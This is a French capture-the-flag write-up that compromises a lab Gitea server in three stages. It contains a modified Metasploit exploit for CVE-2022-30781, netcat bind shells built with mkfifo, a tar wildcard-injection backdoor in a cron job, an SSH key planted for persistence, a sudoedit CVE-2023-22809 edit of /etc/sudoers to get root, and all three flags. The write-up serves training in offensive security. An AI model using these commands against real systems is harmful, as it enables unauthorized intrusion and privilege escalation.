# WRITEUP REALIST / HACK ME IF YOU CAN
## Consigne :

```

Le challenge **Hack me if you can** est en 3 parties (3 flags à valider).

Démarrer un environnement virtuel. **Attention** :
 - Garder votre environnement démarré pour ces 3 parties
 - La durée de vie de l'environnement est limitée


<div>
<button class="btn btn-info" onclick="window.open('/portailvms/8','_blank')" >Accéder au portail</button>
</div>
<p></p>

```

## Pièce(s) jointe(s) :

```
néant
```

## Serveur :

```
PortailVMS
```

## Points attribués :

```
 - part1 : 65
 - part2 : 20
 - part3 : 25
```

## Hint : 

```
néant
```

## Flag :

```
part1 : fl@g{~#Impr0per3ncod1ngOrEscapinG0fOutpUt#~}
part2 : fl@g{//Y0u_H4ve_found_th3_Ho1y_Gr4iL//}
part3 : fl@g{EnvlronmentV4riablePrivi1eGeEsC4L4tI0n=5ud0}
```

## Solution : 

### Part 1

Pour commencer, on réalise un scan réseau avec nmap, afin de trouver les ports ouverts sur la machine (remplacer l'adresse IP par celle allouée par le PortailVMS) :
```bash
nmap 172.24.70.163            
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-03 03:41 EST
Nmap scan report for 172.24.70.163
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
```

Un service SSH sur le port 22, et un autre service sur le port 3000. Il s'agit d'un serveur **gitea**.

La version 1.16.6 de Gitea a une vulnérabilité de type RCE (CVE-2022-30781).

Un exploit MSF (metasploit) est disponible : https://sploitus.com/exploit?id=1337DAY-ID-38073

Je créé un compte sur le serveur gitea (la création de compte est autorisée).

Je copie l'exploit dans `/usr/share/metasploit-framework/modules/exploits/multi/http/gitea_cve_2022_30781.rb` (sur ma kali), et je démarre msfconsole.
```bash
msfconsole
use exploit/multi/http/gitea_cve_2022_30781
set RHOSTS 172.24.70.163
set USERNAME erable
set PASSWORD erable
set LHOST 172.24.8.2
show options

Module options (exploit/multi/http/gitea_cve_2022_30781):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   erable           yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.24.70.163    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to the gitea application
   URIPATH    /                no        The URI to use for this exploit
   USERNAME   erable           yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.24.8.2       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

```

J'exécute l'exploit :
```
exploit
```

Malheureusement, je n'ai pas réussi à avoir un *meterpreter* (ni *shell/reverse_tcp*, ni *shell/bind_tcp*, ...).

Je modifie la ligne 233 du fichier `/usr/share/metasploit-framework/modules/exploits/multi/http/gitea_cve_2022_30781.rb`, en remplaçant :
```
            ref: "--upload-pack=#{@p}",
```
par : 
```
            ref: "--upload-pack=sh -c 'rm -f /tmp/f1; mkfifo /tmp/f1 && cat /tmp/f1 | /bin/bash -i 2>&1 | nc -l 4242 > /tmp/f1 && rm -f /tmp/f1'",
```

Je redémarre msfconsole, reconfigure et relance l'exploit :
```
exploit 

[*] Started reverse TCP handler on 172.24.8.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.5
[*] Using URL: http://172.24.8.2:8080/
[*] Using URL: http://172.24.8.2:8080/POLflaKYwS
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Exploit completed, but no session was created.
```

Dans une autre console :
```
nc 172.24.70.163 4242
bash: cannot set terminal process group (122): Inappropriate ioctl for device
bash: no job control in this shell
<ata/gitea-repositories/erable/oro35t7xmdbaypx.git$ id
id
uid=106(git) gid=112(git) groups=112(git)
<ata/gitea-repositories/erable/oro35t7xmdbaypx.git$ 
```

J'ai réussi à ouvrir un shell, mais avec des privilèges non élevés (utilisateur *git*).

Je récupère le flag :
```bash
cat /home/git/flag.txt
fl@g{~#Impr0per3ncod1ngOrEscapinG0fOutpUt#~}
```

### Part 2

Si je regarde le contenu du fichier `/etc/crontab` :
```
*/3 *   * * *   supervisor    cd /var/lib/gitea/log/ && tar -czf /home/supervisor/backups/git_log_backup.tar.gz *
```

la commande tar exécutée toutes les 3 minutes en tant qu'utilisateur *supervisor* est vulnérable car elle utilise *wilcard* **"*"** (*Wildcard Privilege Escalation*), lire : https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

Le dossier `/var/lib/gitea/log/` appartient à l'utilisateur *git*, cela tombe bien car j'ai un accès en tant que cet utilisateur.

Je créé ma *backdoor* :
```bash
cd /var/lib/gitea/log/
echo "rm -f /tmp/f2; mkfifo /tmp/f2 && cat /tmp/f2 | /bin/bash -i 2>&1 | nc -l 4243 > /tmp/f2 && rm -f2 /tmp/f2" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```

Je n'ai plus qu'à attendre l'exécution de la sauvegarde (3 minutes max) ...

et je me connecte :
```bash
nc 172.24.70.163 4243
bash: cannot set terminal process group (873): Inappropriate ioctl for device
bash: no job control in this shell
supervisor@host-cb4d3861-5c05-4524-b4a5-a935ac9f4d0c:/var/lib/gitea/log$ id
id
uid=1001(supervisor) gid=1001(supervisor) groups=1001(supervisor),112(git)
supervisor@host-cb4d3861-5c05-4524-b4a5-a935ac9f4d0c:/var/lib/gitea/log$ 
```

Je suis arrivé en tant qu'utilisateur *supervisor*.

Je récupère le flag :
```bash
cat /home/supervisor/flag.txt
fl@g{//Y0u_H4ve_found_th3_Ho1y_Gr4iL//}
```

### Part 3

Je créé une paire de clé RSA sur ma machine hôte (commande *ssh-keygen*), et je rajoute la clé publique dans la liste des clés autorisées de la machine vulnérable (à rajouter dans `.ssh/authorized_keys`) :
```bash
mkdir .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDD/fGTbq8f+gjDEZ/3haOGmFB/Hh0/lmlSXybODOc0P1SF69tACvtBf/s9GzJzbEUsDdRXtOysAE0nyRZEJM9bebHsRUNUF7WhKo85zGtX2NLVXGIQ1RUJFzu0RWqyH26uijSnfgV+ny271onGpPl9AKOdYdOFQr5pLLctolYxsb29y1q+nvVsYNdpcZQHPgYq1FmOBUpGSugEjrt17WmstipvVxTGjzbvADJSgqurWlqSxbMYzYai20Cdp+tIuu+wQCiAPVsCuLvDYzFDgMGezQveXT3xPKJUKRC7+rhYO5pVrQCqwPS6NSFoHlN26yK9CqW/qTKMbLrGLzlBkoBtp6eD3CGdq57d94ai3iqP64nNlO4hbqBzVKgyQpZ2KbBga1XtLcnp/1Xf/0i7TVNvjzgjeWgGjghW/fx6F5juqQbX+UHL6nvh37D7eyHuSX0FfgNChlmbgnJYOeyKWQvWB31qMJD3eR8a6kgm7k1YOJZyzs0clauJ3czlvXFUXaE= kali@kali" >> ~supervisor/.ssh/authorized_keys
```

Je peux maintenant me connecter par clé en ssh :

```bash
ssh supervisor@172.24.70.163 -i ~/.ssh/id_rsa 
The authenticity of host '172.24.70.163 (172.24.70.163)' can't be established.
ED25519 key fingerprint is SHA256:ZXiWX8LwcunGMm7445swLLkNtSjO6J2q0HDd8fA66JE.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:1: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.24.70.163' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.10.0-21-amd64 x86_64)
```


La version de sudo est vulnérable à une élévation de privilèges (**CVE-2023-22809**) :
```bash
dpkg -l | grep sudo
ii  sudo                        1.8.31-1ubuntu1                   amd64        Provide limited super user privileges to specific users
```

Et ça tombe bien, j'ai quelques droits en tant que `supervisor` ;-)
```
sudo -l
Matching Defaults entries for supervisor on host-cb4d3861-5c05-4524-b4a5-a935ac9f4d0c:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User supervisor may run the following commands on host-cb4d3861-5c05-4524-b4a5-a935ac9f4d0c:
    (ALL) NOPASSWD: sudoedit /etc/myservice.conf
```


PoC : https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf

Je lance l'exploit :
```
EDITOR='vim -- /etc/sudoers' sudoedit /etc/myservice.conf
```

Cela ouvre le fichier `/etc/sudoers', je rajoute cette ligne puis j'enregistre :
```
supervisor ALL=(ALL) NOPASSWD: ALL
```

Et j'élève mes privilèges :
```
sudo bash
root@host-cb4d3861-5c05-4524-b4a5-a935ac9f4d0c:/home/supervisor# id
uid=0(root) gid=0(root) groups=0(root)
root@host-cb4d3861-5c05-4524-b4a5-a935ac9f4d0c:/home/supervisor# cat /root/flag.txt
fl@g{EnvlronmentV4riablePrivi1eGeEsC4L4tI0n=5ud0}
```

Done ;-)

<!-- Review Taz : 20230321 -->